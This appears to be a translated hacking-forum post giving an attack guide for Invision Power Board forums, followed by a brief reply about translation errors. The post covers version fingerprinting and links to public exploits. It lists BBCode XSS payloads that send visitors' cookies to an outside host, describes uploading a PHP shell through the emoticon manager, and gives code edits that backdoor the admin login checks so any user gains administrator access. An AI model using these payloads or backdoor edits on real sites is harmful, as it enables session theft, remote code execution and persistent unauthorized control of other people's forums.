How to determine the forum version version Invision Power Board 1.3 If there are such folders and files: /html/emoticons/ /fonts/ /Skin/ /ssi_templates/ Such files: ssi.php show.php css.php conf_mime_types.php version Invision Power Board 2.0.* If there are such folders and files: /sources/help.php /sources/usercp.php /sources/trial_functions.php /sources/topics.php /sources/taskloader.php shows error 403 "access forbidden" for example to the folder /ips_kernel/ as 403: Invision Power Board -> Forbidden version Invision Power Board 2.1.* If there are such folders and files: /ips_kernel/PEAR/ Such files info.php shows 403 "accesses forbidden" for example to the folder /ips_kernel/ as 403: Invision Power Board -> Forbidden Exploits Version Invision Power Board 1.3.1 _http://milw0rm.com/id.php?id=1036 Version Invision Power Board 1.* , 2.* (<2.0.4) _http://rst.void.ru/download/r57ipb2.txt Version Invision Power Board 2.0.0 - 2.0.2 _http://milw0rm.com/id.php?id=648 Version Invision Power Board Army System Mod 2.1 _http://www.milw0rm.com/exploits/1492 Version Invision Power Board 2.1.4 (Dos) _http://www.milw0rm.com/id.php?id=1489 Version Invision Power Board <=2.1.5 (Remote code execution) http://forum.antichat.ru/thread18222.html XSS Do not use these codes with a sign "*". It is used so that these codes won't work on this forum. Code: [ema*il]wj@wj[u*rl=http://www.wj.com`=`][/url].com[/email] ` style=`background:url(javascript:document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie);` Code: [HT*ML][EMA*IL][UR*L=wj`=`][/U*RL][/EM*AIL][/co*lor][color=wh*ite]` style=`backg*round:url(javascript:docu*ment.images [1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie)`[/c*olor] Code: [EMA*IL][email protected][U*RL=target/*style=background:url(javasc*ript:document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie); ][/U*RL][/EM*AIL] Code: [po*st=1000[to*pic=target style=background:url(javascript:document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie); ][/to*pic]][/po*st] Code: [em*ail][email protected][/email] ` style=`background:url(javascript:document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie);` Code: [COLOR=[IМG]http://aaa.aa/=`aaa.jpg[/IMG]]` style=background:url(javascript:document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie) Code: [EM*AIL][U*RL=wj`=`][/UR*L][/EM*AIL]]` style=`background:url(javascript:document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie)` Load shell Invision Power Board 1.3 Administration->Manage Emoticons->Upload an Emoticon to the emoticons directory Usually shell is uploaded in one of these folders, depending on a version, if your access is enough 1.3 /forum/html/emoticons/shell.php 2.* /forum/style_emoticons/default/shell.php where shell.php name your loaded shell Trojaning the forum Invision Power Board 1.3 PHP: if ($GROUP['g_access_cp'] != 1) { do_login("You do not have access to the administrative CP"); } else { $session_validated = 1; $this_session = $row; } and change to PHP: if ($GROUP['g_access_cp'] != 1 || $GROUP['g_access_cp'] = 1) { $session_validated = 1; $this_session = $row; } and search lines (by default 442 line) PHP: if ($GROUP['g_access_cp'] != 1) { do_login("You do not have access to the administrative CP"); } else { //---------------------------------- // All is good, rejoice as we set a // session for this user //---------------------------------- $sess_id = md5( uniqid( microtime() ) ); and change to PHP: if ($GROUP['g_access_cp'] != 1 || $GROUP['g_access_cp'] = 1) { //---------------------------------- // All is good, rejoice as we set a // session for this user //---------------------------------- $sess_id = md5( uniqid( microtime() ) ); then we edit the file /sources/Admin/ad_mysql.php and delete lines PHP: if ($MEMBER['mgroup'] != $INFO['admin_group']) { $ADMIN->error("Sorry, these functions are for the root admin group only"); } Invision Power Board 2.0.* /sources/action_admin/login.php by default 147 line and delete lines PHP: if ($mem['g_access_cp'] != 1) { $this->login_form("You do not have access to the administrative CP"); } else { and in a line (by default 206) delete character "}" naturally without quotation marks. sql.php by default 46 line: we delete PHP: if ($this->ipsclass->member['mgroup'] != $this->ipsclass->vars['admin_group']) { $this->ipsclass->admin->error("Sorry, these functions are for the root admin group only"); } then we go here /sources/lib/admin_functions.php (line 262) we change a line: PHP: $this->ipsclass->admin_session['_session_validated'] = 0; change to PHP: $this->ipsclass->admin_session['_session_validated'] = 1; then we delete lines in the file /sources/sql_mysql.php (by default 76 line) Code: if ($this->ipsclass->member['mgroup'] != $this->ipsclass->vars['admin_group']) { $this->ipsclass->admin->error("Sorry, these functions are for the root admin group only"); } [CODE] Now we'll explain all this in details, when you call in admincp (not "troyaning"), verification of if ($GROUP['g_access_cp'] != 1) have you acces for admincp { do_login("you do not have access to the administrative CP"); } For the receipt of access it is necessary to change this line of if ($GROUP['g_access_cp'] != 1) to if ($GROUP['g_access_cp'] != 1 || $GROUP['g_access_cp'] == 1 ) -------------------- Thanks [B]qBiN[/B] Original version here: http://forum.antichat.ru/thread11615.html by [b]k1b0rg[/b] [SIZE=1][edit: some mistakes were corrected (too tired to look more), real copyrights added] [/SIZE]
Did you use a translator? Plenty of mistakes... When I come back home, I'll correct your post. Check your translation next time please.